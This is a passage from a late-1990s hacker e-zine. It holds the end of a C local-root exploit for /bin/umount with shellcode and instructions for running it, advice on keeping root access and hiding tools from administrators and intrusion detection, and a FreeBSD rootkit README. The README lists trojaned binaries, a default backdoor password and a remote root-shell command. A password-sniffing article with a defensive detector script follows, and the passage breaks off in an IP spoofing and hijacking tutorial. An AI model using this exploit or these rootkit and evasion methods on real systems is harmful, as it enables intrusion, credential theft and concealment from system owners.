  6320.        ::::: $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$$ $$$$$$ $$$$$$ ::::::
  6321.        ::::::`S$$$$s$$$$S' `S$$$$s$$$$S' `S$$$$s$$$$S' $$$$$$$ $$$$$$ $$$$$$ ::::::
  6322.        :::::::...........:::...........:::...........::.......:......:.......::::::
  6323.        :::::::::::::::::::::::::::::::::::::::::::::::;::::::::::::::::::::::::::::
  6324.        
  6325.        Discovered and Coded by Bloodmask & Vio
  6326.        Covin 1996
  6327.        */
  6328.        
  6329.        #include <unistd.h>
  6330.        #include <stdio.h>
  6331.        #include <stdlib.h>
  6332.        #include <fcntl.h>
  6333.        #include <sys/stat.h>
  6334.        
  6335.        #define PATH_MOUNT "/bin/umount"
  6336.        #define BUFFER_SIZE 1024
  6337.        #define DEFAULT_OFFSET 50
  6338.        
  6339.        u_long get_esp() 
  6340.        { 
  6341.          __asm__("movl %esp, %eax"); 
  6342.        
  6343.        }
  6344.        
  6345.        main(int argc, char **argv)
  6346.        {
  6347.          u_char execshell[] = 
  6348.           "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
  6349.           "\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
  6350.           "\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";
  6351.        
  6352.           char *buff = NULL;
  6353.           unsigned long *addr_ptr = NULL;
  6354.           char *ptr = NULL;
  6355.           
  6356.           int i;
  6357.           int ofs = DEFAULT_OFFSET;
  6358.           
  6359.           buff = malloc(4096);
  6360.           if(!buff)
  6361.           {
  6362.              printf("can't allocate memory\n");
  6363.              exit(0);
  6364.           }
  6365.           ptr = buff;
  6366.        
  6367.           /* fill start of buffer with nops */
  6368.        
  6369.           memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell));
  6370.           ptr += BUFFER_SIZE-strlen(execshell);
  6371.        
  6372.           /* stick asm code into the buffer */
  6373.        
  6374.           for(i=0;i < strlen(execshell);i++)
  6375.              *(ptr++) = execshell[i];
  6376.        
  6377.           addr_ptr = (long *)ptr;
  6378.           for(i=0;i < (8/4);i++)
  6379.              *(addr_ptr++) = get_esp() + ofs;
  6380.           ptr = (char *)addr_ptr;
  6381.           *ptr = 0;
  6382.        
  6383.           (void)alarm((u_int)0);
  6384.           printf("Discovered and Coded by Bloodmask and Vio, Covin 1996\n");
  6385.           execl(PATH_MOUNT, "mount", buff, NULL);
  6386.        }
  6387.                
  6388.                
  6389.         <snip>
  6390.         
  6391.         the above example requires that you have access to a compiler and
  6392.         that is not always the case in a restricted shell environment, to
  6393.         compile the above code copy it to mount.c and use gcc -o mountx 
  6394.         mount.c then run ./mountx to initiate the compromise, you will be
  6395.         rewarded (in an unpatched system) with a root shell.
  6396.         
  6397.         Once you have root you want to keep it unless you are doing a hit
  6398.         and run or web server hack, for this you'll probably want to use
  6399.         what is known as a ROOTKIT. The rootkit is a package that contains 
  6400.         various programs which have been patched (trojaned) to ensure that
  6401.         if your initial entry has been found you can regain access by one
  6402.         of the various methods included in the rootkit. Common trojaned
  6403.         programs include su (which will track all user logins by the super
  6404.         user (root user) and store or mail the logins and passwords to you
  6405.         either in a local file or email, it is safer to store the passwords
  6406.         in a local file which is hidden somewhere deep in the system than
  6407.         to email the password changes to an email account as you can be
  6408.         traced using the email method and it will show up in an IDS audit
  6409.         (IDS=Intrusion Detection Software) most large sites and secure
  6410.         sites will have some form of IDS running at regular intervals so
  6411.         you may have to reinstall or be creative in your deployment of the
  6412.         rootkit programs. create several copies of the programs on the system
  6413.         and use innocuous names such as ./safe_backup for your programs, a
  6414.         dumb sysadmin on a busy system may assume that these were left for
  6415.         root compromise eventualities by another sysadmin. Other trojaned
  6416.         files that are common in rootkits are obvious, telnet and ftp for 
  6417.         instance, will also store or email logins and passwords. A good
  6418.         rootkit is available for most common unices and will usually also
  6419.         contain a sniffer program.
  6420.         
  6421.         Here is an example of the contents of a rootkit from a README for
  6422.         a freebsd rootkit available around the net (try Packetstorm) this 
  6423.         was originally published in CRH (Confidence Remains High) an excellent
  6424.         HPA zine, look for it and read it,a very good source for info.
  6425.         
  6426.        <SNIP>
  6427.         
  6428.        Ok.. I found this rootkit out on an ftp site somewhere. Anyway, when I got it, there was a bunch of compile errors and it seemed to be for an older version of freebsd. So, I took a new source tree from my box and copied the trojan code from this rootkit into it.. So, this rootkit should work on FreeBSD 2.2.5-RELEASE.
  6429.  
  6430.        Ok.. I left out the following trojans and files:
  6431.        
  6432.        chpass          Trojaned! User->r00t
  6433.        passwd          Trojaned! User->r00t
  6434.        zapbsd2         An improved utmp/wtmp/lastlog type zapper
  6435.        tripwire        Trojaned! Hide changes
  6436.        
  6437.        but I put in:
  6438.        
  6439.        marryv11.c      good log cleaner.. i put a #define bsd in it
  6440.        
  6441.        Enjoy,
  6442.        humble - jmcdonal@unf.edu 1/15/98
  6443.        
  6444.        Thanks to ducksquak, simpson and sygma for testing.
  6445.        
  6446.        The
  6447.         _____              ____ ____  ____  
  6448.        |  ___| __ ___  ___| __ ) ___||  _ \ 
  6449.        | |_ | '__/ _ \/ _ \  _ \___ \| | | |
  6450.        |  _|| | |  __/  __/ |_) |__) | |_| |
  6451.        |_|  |_|  \___|\___|____/____/|____/  rootkit 1.2 (1/27/97) by Method
  6452.                                             
  6453.        NOTE: This package was heavily influenced by the existing Linux rootkit, 
  6454.        which in turn was adapted from the SunOS rootkit, etc., etc.
  6455.        
  6456.        UPDATES: 1.0.1 - Fixed some broken Makefile stuff.  Made it so inetd does 
  6457.        the right thing on a SIGHUP.  Added some extra security to the shell trojans.
  6458.        1.1 - Added tripwire trojan.  Cleaned up some other stuff.
  6459.        1.2 - Put a password on inetd (Thanks for the suggestion Whoot :)
  6460.        
  6461.        This package includes the following:
  6462.        
  6463.        chpass          Trojaned! User->r00t
  6464.        inetd           Trojaned! Remote access
  6465.        login           Trojaned! Remote access
  6466.        ls              Trojaned! Hide files
  6467.        du              Trojaned! Hide files
  6468.        ifconfig        Trojaned! Hide sniffing
  6469.        netstat         Trojaned! Hide connections
  6470.        passwd          Trojaned! User->r00t
  6471.        ps              Trojaned! Hide processes
  6472.        rshd            Trojaned! Remote access
  6473.        syslogd         Trojaned! Hide logs
  6474.        fix             File fixer!
  6475.        addlen          File length fixer(!)
  6476.        zapbsd2         An improved utmp/wtmp/lastlog type zapper
  6477.        bindshell       port/shell type daemon!
  6478.        tripwire        Trojaned! Hide changes
  6479.        sniffit         A kewl sniffz0r!
  6480.                        
  6481.        INSTALLATION:
  6482.        To install this kit execute the command 'make all install' from the # prompt.
  6483.        All of the file/password configurations are in config.h so feel free to
  6484.        modify things to suit your particular fancy.  Everything here has been 
  6485.        tested on a FreeBSD-stable distribution. See the note at the end about 
  6486.        what to do if the admin uses tripwire. Also make sure to read the 
  6487.        Makefile and scripts so you know what's going on.
  6488.        
  6489.        USAGE:
  6490.        OK I will go through how to use each program one by one. NOTE when I say 
  6491.        password I mean the rootkit password not your users password (d0h!). By 
  6492.        default the rootkit password is "h0tb0x".
  6493.        
  6494.        chpass -        Local user->root. Run ch{sh,fn,pass} then when it asks you 
  6495.                        for a new name enter your password.
  6496.        
  6497.        inetd -         Binds a shell to a port for remote access. Adds a shell 
  6498.                        exec service on the ingreslock port, type in the rootkit
  6499.                        password to start a shell.
  6500.        
  6501.        login -         Allows login to any account with the rootkit password.
  6502.                        If root login is refused on your terminal login as "r00t".
  6503.                        History logging is disabled if you login using your password.
  6504.        
  6505.        ls -            Trojaned to hide specified files and directories.
  6506.                        The default data file is /dev/ptyr.
  6507.                        All files can be listed with 'ls -/'.
  6508.                        The format of /dev/ptyr is:
  6509.                        ptyr
  6510.                        fbsdrootkit-1.0
  6511.                        pr0n
  6512.                        Use partial filenames. This would hide any files/directories 
  6513.                        with the names ptyr, fbsdrootkit-1.0 and pr0n.
  6514.        
  6515.        du -            (see ls)
  6516.        
  6517.        ifconfig -      Modified to remove PROMISC flag on the ethernet device.
  6518.        
  6519.        netstat -       Modified to remove tcp/udp/sockets from or to specified
  6520.                        addresses, paths and ports.
  6521.                        default data file: /dev/ptyq
  6522.                        command 1: hide local address
  6523.                        command 2: hide remote address
  6524.                        command 3: hide local port
  6525.                        command 4: hide remote port
  6526.                        command 5: hide UNIX socket path
  6527.        
  6528.                        example:
  6529.                        1 128.31        <- Hides all local connections from 128.31.X.X
  6530.                        2 128.31.39.20  <- Hides all remote connections to 128.31.39.20
  6531.                        3 8000          <- Hides all local connections from port 8000
  6532.                        4 6667          <- Hides all remote connections to port 6667
  6533.                        5 .term/socket  <- Hides all UNIX sockets including the path 
  6534.                                           .term/socket
  6535.                        
  6536.        passwd -        Local user->root. Enter your rootkit password instead of your
  6537.                        old password.
  6538.        
  6539.        ps -            Modified to remove specified processes.
  6540.                        Default data file is /dev/ptyp.
  6541.                        An example data file is as follows:
  6542.                        0 0             Strips all processes running under root
  6543.                        1 p0            Strips tty p0
  6544.                        2 sniffer       Strips all programs with the name sniffer
  6545.                        Don't put in the comments, obviously.
  6546.        
  6547.        rshd -          Execute remote commands as root. 
  6548.                        Usage: rsh -l rootkitpassword host command
  6549.                        i.e. rsh -l h0tb0x 0wn3d.escape.com /bin/sh -i
  6550.                        would start a root shell.
  6551.        
  6552.        syslogd -       Modified to remove specified strings from logging.
  6553.                        I thought of this one when I was on a system which logged
  6554.                        every connection.. I kept getting pissed off with editing
  6555.                        files every time I connected to remove my hostname. Then I 
  6556.                        thought 'Hey dude, why not trojan syslogd?!' and the rest
  6557.                        is history. :)
  6558.                        Default data file is /dev/ptys
  6559.                        Example data file:
  6560.                        evil.com
  6561.                        123.100.101.202
  6562.                        rshd
  6563.                        This would remove all logs containing the strings evil.com,
  6564.                        123.100.101.202 and rshd. Smart! :))
  6565.        
  6566.        sniffit -       An advanced network sniffer. This is pretty kewl and has lots
  6567.                        of filtering options and other stuff. Useful for targetting a
  6568.                        single host or net. Sniffit uses ncurses.
  6569.        
  6570.        bindshell -     This is pretty self-explanatory. Basically it binds a 
  6571.                        shell to a port, 31337 by default. Read the source on 
  6572.                        this one.
  6573.        
  6574.        fix -           Replaces and fixes timestamp/checksum infomation on files.
  6575.                        I modified this a bit for my own uses and to fix a nasty bug
  6576.                        when replacing syslogd and inetd. The replacement file will
  6577.                        be erased by fix (unlike other versions).  
  6578.        
  6579.        addlen -        This quickie modifies the length of files by adding 
  6580.                        harmless zeros to the end. Wonder why nobody ever 
  6581.                        thought of doing this before. Inspired by a stupid 
  6582.                        security tool which checks lengths of setuid files.
  6583.        
  6584.        zapbsd2 -       This improved version of zapbsd writes over entries with 
  6585.                        ones instead of zeros.  I added some capabilities and 
  6586.                        error checking so I raised the number.
  6587.        
  6588.        TRIPWIRE:
  6589.        I have done a major improvement of this part. Simply make tripwire and 
  6590.        the script will ask you a few questions and take action depending on your 
  6591.        responses. If both the database file and tripwire binary are read-only 
  6592.        then there is nothing you can do.
  6593.        
  6594.        SOURCES:
  6595.        Some of these patches are derived from the original SunOS rootkit. ls, 
  6596.        du, ps, netstat and chpass were done by yours truly. Anything else came 
  6597.        from the Linux rootkit with a few modifications. The idea for tripwire 
  6598.        was my own.
  6599.        
  6600.        OTHER:
  6601.        I welcome all comments and questions at method@yikes.com. All complaints 
  6602.        and flames will be sent to /dev/null.
  6603.        
  6604.        Thanks to OGhost and Phelix for beta testing and advice.
  6605.        
  6606.        In closing, this kit can only take you so far. Although it covers almost 
  6607.        everything, a competent sysadmin will eventually catch on. Remember, 
  6608.        never let your guard down.
  6609.        -M
  6610.        
  6611.        <SNIP>
  6612.         
  6613.         Packet Sniffing
  6614.         ~~~~~~~~~~~~~~~
  6615.         Read the papers 'things that go bump on the net' and others of that
  6616.         ilk for a good idea what can happen to a compromised system that has
  6617.         had a sniffer installed. You can sniff kerberos tickets and setup
  6618.         irc interception filters to gain access to oper passwords and 'leet
  6619.         channels among other things by using a sniffer on a well placed 
  6620.         system somewhere on the backbone. Use traceroute to determine where
  6621.         a likely target is located and start your scan from there.
  6622.         
  6623.         Here is an excerpt from HiR #8 on packet sniffing, which gives a good
  6624.         outline of the sniffing concept and includes some code, taken directly
  6625.         from the Hackers Information Report site and included here for complete
  6626.         ness. Please check out their site for further great information and a 
  6627.         good news letter archive.
  6628.            
  6629.          Main site:
  6630.          
  6631.            http://axon.jccc.net/hir/
  6632.            
  6633.          This excerpt:
  6634.          
  6635.            http://axon.jccc.net/hir/articles/hir8/hir8-9.txt
  6636.         
  6637.         <snip>
  6638.         
  6639.                                         HiR 8
  6640.        -]]])))}}}>>> Packet Sniffing Techniques For The Novice User <<<{{{((([[[-
  6641.                                         by Axon
  6642.        
  6643.        Ahh, the wonderful world of packet sniffing.  You may or may not have done
  6644.        this before...
  6645.        
  6646.        "Sniffing" is the process of putting your computer's network card into
  6647.        what's called "promiscuous mode".  It will read all packets that it sees
  6648.        (whereas normally it only reads the packets that have its address on it).
  6649.        After the card is placed in this mode, a sniffer will track packets
  6650.        (usually parsing the useful data out of the packet and writing it to a log
  6651.        file onto the hard disk).  This is a really good way of doing a few things
  6652.        on a network:
  6653.        
  6654.                o Gathering traffic information, looking for lan stations that are
  6655.                  abusing bandwidth.
  6656.        
  6657.                o Actually looking at the data inside the packets to see what
  6658.                  files people are downloading with FTP, watching telnet sessions,
  6659.                  and even watching their usernames and passwords.
  6660.        
  6661.                o Getting a general Idea of where most of the packets are coming
  6662.                  from and going to, as a troubleshooting measure.
  6663.        
  6664.        There are sniffing programs for almost every platform.  My favorite
  6665.        platform is linux, as it is already my Operating System of choice, and  
  6666.        there are quite a few really easy to use sniffers for it.  These include:
  6667.        tcpdump, sniffit, iptraf, and linsniffer.  Those are what I use the most.
  6668.        My favorite floppy-linux distribution, Trinux, comes with sniffit, iptraf,
  6669.        and linsniffer.  Almost every "big" linux distro (Red Hat, Debian,
  6670.        Caldera, etc) comes with tcpdump, although you might have to select a
  6671.        special option to have it installed automatically.
  6672.        
  6673.        Tcpdump is probably the hardest of the three to learn how to use.  It
  6674.        mostly dumps raw tcp packets out to standard output (or wherever you
  6675.        redirect it to).  It has other options, too, but overall, it's difficult
  6676.        to use for the beginner.  I'll focus more on the other two.
  6677.        
  6678.        Linsniffer is quite possiby the most evil of the sniffers I've mentioned.
  6679.        All it does is get passwords.  It looks for http passwords, telnet
  6680.        passwords, ftp passwords, and mail passwords.  It does a pretty good job,
  6681.        but really lacks an "ethical" use.  You can get linsniffer (or any of
  6682.        these sniffers) wherever you can find linux software (places like sunsite,
  6683.        which is now metalab.unc.edu).  All you do is run "linsniffer" as root.
  6684.        It will not display any output. Everything it finds will be placed in a
  6685.        file called "tcp.log" in the directory you were in when you started
  6686.        linsniffer.
  6687.        
  6688.        Sniffit is extremely cute.  It's harder to find passwords with it, but if
  6689.        your goal has nothing to do with you finding passwords, and more to do
  6690.        with watching who is connected to what, and maybe even watching the actual
  6691.        connection, this is for you.  With Sniffit, I have many times been
  6692.        successful in watching the exact telnet screen of people that are on my
  6693.        segment.  You can redirect the sniffed output to another virual console,
  6694.        and that console becomes the telnet screen of the person whom you are
  6695.        sniffing.  You see what they type, what they get back, you watch them read
  6696.        their e-mail with pine, as if their ghost was sitting there using your
  6697.        screen.
  6698.        
  6699.        Iptraf isn't really a "sniffer" by industry terms, but it still uses
  6700.        promiscuous mode to operate, Therefore I call it a "sniffer".  Iptraf will
  6701.        break down the traffic stream into chunks for you, so you can see exactly
  6702.        what kind of packets are being exchanged, how big they are, and where they
  6703.        are coming from and going to.  This proghram is not good for looking at
  6704.        the actual data inside the packet, but it's great for finding out who is
  6705.        hogging the bandwidth, and what they're hogging it with.
  6706.        
  6707.        As far as snifgfing on other platforms... For Windows 95 and 98 There is
  6708.        also a plugin for the ever-famous back-orifice program that does
  6709.        sniffing, called "Butt Sniffer".  There is also a non-plugin version that
  6710.        just runs in an MS-Dos window under Windows 95/98.  This is probably the
  6711.        best Windows 9x sniffer I've seen, and it's worth looking into.  It's
  6712.        available through www.cultdeadcow.com under the backorifice page
  6713.        somewhere.  Shoutouts to the author, Mudge (who kicked ass at DefCon) =]
  6714.         
  6715.        ------------------------------------------------------------------------------
  6716.        
  6717.        So, if it's so easy to just watch what's going on on the local network,
  6718.        there must be loads of people doing it, right?  Well, the paranoid would
  6719.        say so, but in actuality, there isn't probably a whole lot of it going on.
  6720.        I'm not saying that there isn't ANY.  So if there's even the possibility
  6721.        that it's there, how would one stay protected from the evils of
  6722.        sniffing?
  6723.        
  6724.        Well, the apostols (a spanish hacking group, if memory serves correctly)
  6725.        has a few really good products.  (One being QueSO, a remote tcp/ip
  6726.        fingerprinter for detecting what OS is being run on a remote machine),
  6727.        but the one we focus on here is "NEtwork Promiscuous Ethernet Detector"
  6728.        (or "neped").  It only runs on UNIX/Linux (that I know of.  It's not
  6729.        directly compileable on windows, but I'm not much of a programmer.  It
  6730.        might be easy to do).  I Wrote a small shell script that uses neped as a
  6731.        core to take action when promiscuous mode is detected.
  6732.        
  6733.        sniffdetect.sh is configureable and can run a shell script or a program
  6734.        once as soon as sniffing is detected, and will run another program or
  6735.        script as soon as it sees the sniffing has stopped.  It can be used to
  6736.        stop services on your system, e-mail an administrator, page someone, or
  6737.        even to shut down the machine (although I don't know why you would want
  6738.        to do such a thing).  I set it up to blast the IP and MAC address of the
  6739.        sniffing machine to my pager, and to tell me that sniffing has ceased when
  6740.        it stops detecting the runnuing sniffers (I wrote some paging software
  6741.        that sends out alpha pages to me from the command line to do this).  In
  6742.        theory, It's very possible to make something that will launch a
  6743.        counter-attack/Denial of Service against the sniffing machine, but I'm not
  6744.        really a believer in that method.  Here's my shell script.
  6745.        
  6746.        sniffdetect.sh:
  6747.        -------------begin-------------------------------------------------------
  6748.        #!/bin/sh
  6749.        ## Cheap-ass promiscuous mode watcher/action-taker
  6750.        ## Written by axon 
  6751.        ##
  6752.        ## Requires "NEtwork Promiscuous Ethernet Detector" (neped.c)
  6753.        ## ftp://apostols.org/AposTools/snapshots/neped/neped.c
  6754.        ##
  6755.        ## This program must be run as root, or neped must be set-uid root.
  6756.        ##
  6757.        #########################################################################
  6758.        ##
  6759.        ## Config Options!
  6760.        ##
  6761.        ######
  6762.                                # Command or shell script that's run when promisc.
  6763.        promisccmd="promisc.sh" # mode card is found.  This might shut down a
  6764.                                # service, or e-mail an administrator.  Up to you.
  6765.                                # (you must write a promisc.sh script or change
  6766.                                # this variable)
  6767.        
  6768.                                        # Command or shell script that's run when
  6769.        nopromisccmd="nopromisc.sh"     # promisc. mode ceases.  This might page
  6770.                                        # an administrator or restart a service.
  6771.                                        # (you must write a nopromisc.sh script or
  6772.                                        # change this variable)
  6773.        while true
  6774.        do
  6775.        while true
  6776.        do
  6777.                                        # Counts number of lines
  6778.        neped=`neped eth0 | wc -l`      # that are returned
  6779.                                        # by neped.
  6780.        
  6781.        if [ $neped -gt 8 ];then        # This runs the command of your
  6782.        $promisccmd                     # choice when promisc. mode
  6783.        break                           # is detected
  6784.        
  6785.        neped eth0|grep "*>" >> promisc.log  # appends output of neped to promisc.log
  6786.        
  6787.        fi
  6788.        done
  6789.        while true
  6790.        do
  6791.                                        # Counts number of lines
  6792.        neped=`neped eth0 | wc -l`      # that are returned
  6793.                                        # by neped.
  6794.        
  6795.        if [ $neped = 8 ];then          # This runs the command of your
  6796.        $nopromisccmd                   # choice when promisc. mode
  6797.        break                           # ceases
  6798.        fi
  6799.        done
  6800.        done
  6801.        ----------------end sniffdetect.sh------------------------------------------
  6802.        
  6803.        I hope that this gives you the edge that you need.  This was in no way a
  6804.        very elaborate "sniffing how-to".  You can go anywhere to get that sort of
  6805.        information.  This was focused more on how it works, and what tools are
  6806.        used to do it, and how to protect yourself from the world of packet
  6807.        sniffers.
  6808.        
  6809.        <snip>
  6810.        
  6811.        More info from various sources, to be continued next issue ...
  6812.         
  6813.        Cruciphux
  6814.         
  6815.         P.S "Hacking IRC" is still in progress and will also be continued in a 
  6816.         further issue of the zine its not forgotten or dead by any means. - Ed
  6817.         
  6818.         
  6819.         @HWA
  6820.         
  6821.   SITE.1 Featured.site.http://www.real-secure.org/ Ezine excerpt: IP Spoofing
  6822.          ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  6823.        
  6824.         I just stumbled acrosss this site while scanning the new affiliates
  6825.      list on HNN, its quite good, interesting layout, interesting information
  6826.      and a little different from the norm...well worth checking out here is a
  6827.      excerpt from their ezine on IP spoofing, since this ties in nicely with the
  6828.      "HOW.TO" section i've included the entire section on IP Spoofing from the
  6829.      zine for a taste of what to expect. Check out the site for more info.
  6830.      
  6831.        
  6832.        
  6833.        
  6834.               -=[ A short overview of IP spoofing: PART I ]=-
  6835.                     -=[ Part of 'The Packet Project']=-
  6836.                                                  
  6837.                    (Includes Source for Linux 1.3.X and later kernels)
  6838.            All text and Source code written by Brecht Claerhout (Copyright 1996)
  6839.                         All source tested on Linux kernel 2.0.X  
  6840.           All packet data captured with Sniffit 0.3.2 (a pre-release at that time)
  6841.        -------------------------------------------------------------------------------
  6842.        
  6843.        PART I: Simple spoofing (Non blind) 
  6844.        -----------------------------------
  6845.        
  6846.        0. Introduction         
  6847.        0.1 What
  6848.        0.2 For whom
  6849.        0.3 Disclaimer
  6850.        0.4 Licence
  6851.        
  6852.        1. Short explanation of some words 
  6853.        
  6854.        2. Description of sourcecode
  6855.        2.1 Source included
  6856.        2.2 Programmer notes
  6857.        
  6858.        3. TCP/IP (UDP) in an hazelnutshell
  6859.        
  6860.        4. Non-blind spoofing
  6861.        4.1 Know what you are doing
  6862.        4.2 SYN flooding
  6863.        4.3 Connection Killing 
  6864.        4.3.1 Using reset (RST)
  6865.        4.3.2 Closing a connection (FIN)
  6866.        4.3.3 Improving
  6867.        4.4 Connection Hijacking
  6868.        4.5 Other
  6869.        
  6870.        5. The source code
  6871.        
  6872.        -------------------------------------------------------------------------------
  6873.                            PART I: Simple spoofing (Non blind)
  6874.        ------------------------------------------------------------------------------
  6875.        
  6876.        0. Introduction
  6877.        ---------------
  6878.        
  6879.        0.1 What
  6880.        --------
  6881.        
  6882.        This document describes some IP spoofing attacks and gives you example 
  6883.        source code of the programs used for these attacks (and packet sniffer 
  6884.        logs, so you see what exactly happens).
  6885.        It also provides you with an easy to use include file for experimenting a 
  6886.        little yourself.
  6887.        Oh, if you make something nice with the "spoofit.h" file, please mail it to me
  6888.        (or a reference where it is available) with a little explanation on what it
  6889.        is (a few lines are enough)...
  6890.        
  6891.        If you have interesting remarks, comment, idea's, ... please contact me
  6892.                Brecht Claerhout <Coder@reptile.rug.ac.be>
  6893.                PoBox 144
  6894.                9000 Gent 12
  6895.                Belgium
  6896.        
  6897.        If YOU think of yourself, you are "3><Tr3/\/\3lY 3Le3T", please don't bother 
  6898.        contacting me. 
  6899.        Flames >/dev/null or >/dev/echo depends on how smart you are.
  6900.        
  6901.        It is not wise to use what you don't know/understand, so read this before 
  6902.        trying anything... it will only take a few minutes, and probably save you 
  6903.        some hours of failure...
  6904.        
  6905.        This code is not crippled in the usual way (removing some vital parts), 
  6906.        the power is limited by it's briefness, because I wanted to keep 
  6907.        everything simple and illustrative (but working). It's a simple job to 
  6908.        improve it, and that is the goal of this doc, that you improve it yourself.
  6909.        
  6910.        Thanks too Wim Vandeputte for spellchecking, and putting up 
  6911.        with my constant nagging about IP during the writing of this sh!t...
  6912.        
  6913.        0.2 For whom
  6914.        ------------
  6915.        
  6916.        For people with an elementary knowledge of TCP/IP, some knowledge on C (only 
  6917.        the basic setup) and some general UNIX knowledge.
  6918.        It's no use reading this document if you are completely unaware of these 
  6919.        things, but mind you, only a little knowledge is enough.
  6920.        
  6921.        0.3 Disclaimer
  6922.        --------------
  6923.        
  6924.        I am in no way responsible for the use of this code. By using this 
  6925.        software and reading this document you accept the fact that any damage 
  6926.        (emotional, physical, dataloss and the end of the world as we know it ...) 
  6927.        caused by the use or storage of these programs/documents is not MY 
  6928.        responsability.
  6929.        
  6930.        I state that during the writing and testing of this document/source, I 
  6931.        never violated any law. All spoofing was done between machines where I had 
  6932.        legit root access, or where I had the permission from the legit root.
  6933.        
  6934.        This code can be written by any competent programmer, so this source is 
  6935.        not so harmfull as some will say (cauz' I'm sure some people won't like 
  6936.        this degree of disclosure).
  6937.        
  6938.        0.4 Licence
  6939.        -----------
  6940.        
  6941.        All source code and text is freely available. You can spread it, as long 
  6942.        as you don't charge for it (exceptions are a small reproduction fee, if 
  6943.        it isn't spread together with commercial software, texts.)
  6944.        You may not spread parts of the document, it should be spread as one 
  6945.        package. You may not modify the text and/or source code. 
  6946.        
  6947.        You can use the spoofit.h or derived code in your own programs as long as 
  6948.        they are not commercial (i.e. FREE), and you give me the credits for it.
  6949.        
  6950.        
  6951.        1. Short explanation of some words 
  6952.        ----------------------------------
  6953.        
  6954.        This is a short explanation of some words you might see in the 
  6955.        text/source. You probably know all this, but I put it in here anyway.
  6956.        
  6957.        Sniffit
  6958.          My favourite Packet Sniffer, all sniffed sequences in this 
  6959.          document where created with it. Sniffit can be obtained from:
  6960.          http://reptile.rug.ac.be/~coder/sniffit/sniffit.html
  6961.          Off course any other decent sniffer will do (but this one wears my 
  6962.          personal marks and approval).
  6963.          (At time of writing a pre-release 0.3.2)
  6964.        
  6965.        IP-spoofing (further referenced to as spoofing)
  6966.          The forging of IP packets 
  6967.          NOTE that not only IP based protocols are spoofed.
  6968.          NOTE that spoofing is also used on a constructive base (LAN spoofing, 
  6969.               not discussed here).
  6970.          NOTE that I don't use it on a constructive base ;)
  6971.        
  6972.        Non-blind spoofing
  6973.          Using the spoofing to interfer with a connection that sends packets 
  6974.          along your subnet (so generally one of the 2 hosts involved is located 
  6975.          on your subnet, or all data traffic has to be passing your network 
  6976.          device,... you might consider taking a job at some transatlantic route 
  6977.          provider).
  6978.        
  6979.        Blind spoofing
  6980.          Using the spoofing to interfer with a connection (or creating one), 
  6981.          that does not send packets along your cable. 
  6982.        
  6983.        
  6984.        2. Description of sourcecode
  6985.        ----------------------------
  6986.        
  6987.        2.1 Source included
  6988.        -------------------
  6989.        spoofit.h
  6990.          The include file that provides some easy to use spoofing functions.
  6991.          To understand the include file and it's functions, read the header of 
  6992.          that file for use of the C functions.
  6993.        
  6994.        *.c
  6995.          Example programs (on the use of spoofit.h) that are discussed in this 
  6996.          document.
  6997.          Details on these programs are included in the appropriate sections.
  6998.        
  6999.        sniper-rst.c
  7000.          Basic TCP connection killer.
  7001.          (denial-of-services)
  7002.        
  7003.        sniper-fin.c
  7004.          Basic TCP connection killer.
  7005.          (denial-of-services)
  7006.        
  7007.        hijack.c
  7008.          Simple automated telnet connection hijacker.
  7009.        
  7010.        2.2 Programmer notes
  7011.        --------------------
  7012.        
  7013.        These programs are just examples. That means, they could be improved a 
  7014.        lot. Because I wanted to keep them short and leave some stuff to your 
  7015.        imagination, they are very simple.
  7016.        However they all work and are a good starting point.
  7017.  
  7018.        
  7019.        3. TCP/IP (UDP) in an hazelnutshell
  7020.        -----------------------------------
  7021.        
  7022.        Because it has been explained enough in 'Phrack Volume Seven, Issue 
  7023.        Forty-Eight, File 14 of 18' by daemon9/route/infinity , and there is a lot of 
  7024.        documentation available on the subject I will only repeat some things 
  7025.        very briefly. (Please read the phrack #48 file or any other document on 
  7026.        the subject before reading this).
  7027.        
  7028.        A connection is fully defined with 4 parameters, a source host and port, 
  7029.        and a destination host and port.
  7030.        
  7031.        When you make a connection, data is send in packets. Packets take care of 
  7032.        low level trafic, and make sure the data arrives (sometimes with special 
  7033.        error handling). The spine of most networks is the IP protocol version 4. 
  7034.        It is totally independent of all hardware protocols.
  7035.        
  7036.        TCP and UDP are higher level protocols wrapped up in IP packets.
  7037.        
  7038.        All those packets consist of a header and data.
  7039.        
  7040.        IP header contains (amongst other things): IP of source and destination 
  7041.        hosts for that packet, and the protocol type of the packet wrapped up in 
  7042.        it. (TCP=6, UDP=17, etc.).
  7043.        
  7044.        UDP packets contain (amongst other things): port number of source and 
  7045.        destination host. UDP has no such thing as SEQ/ACK, it is a very weak 
  7046.        protocol.
  7047.        
  7048.        TCP packets contain (amongst other things): port number of source and 
  7049.        destination host, sequence and acknowledge numbers (further refered to as 
  7050.        SEQ/ACK), and a bunch of flags.
  7051.        SEQ number: is counted byte per byte, and gives you the number of the 
  7052.                    NEXT byte to be send, or that is send in this packet.
  7053.        ACK number: is the SEQ number that is expected from the other host.
  7054.        SEQ numbers are chosen at connection initiation.
  7055.        
  7056.        I said is was going to be short... If you didn't understand the above 
  7057.        text, read up on it first, because you won't understand sh!t of the rest.
  7058.        
  7059.        
  7060.        4. Non-blind spoofing
  7061.        ---------------------
  7062.        
  7063.        4.1 Know what you are doing
  7064.        ---------------------------
  7065.        
  7066.        The concept of non-blind spoofing (NBS further in this doc) is pretty 
  7067.        simple. Because packets travel within your reach, you can get the current 
  7068.        sequence and acknowledge (SEQ/ACK further in this doc) numbers on the 
  7069.        connection. 
  7070.        NBS is thus a very easy and accurate method of attack, but limited to 
  7071.        connections going over your subnet. 
  7072.        In spoofing documentation these attacks are sometimes ommited, because 
  7073.        they are mostly 'denial-of-service' attacks, or because people don't 
  7074.        realise the advantage a spoof (in particulary a hijack) can have above 
  7075.        simple password sniffing.
  7076.        
  7077.        Spoofing in generally is refered to as a verry high level of attack. This 
  7078.        refers to blind spoofing (BlS further in this doc), because NBS is 
  7079.        kidstuff for a competent coder.
  7080.        
  7081.        4.2 SYN flooding
  7082.        ----------------
  7083.        
  7084.        Thoroughly discussed in 'Phrack Volume Seven, Issue Forty-Eight, File 13 of 
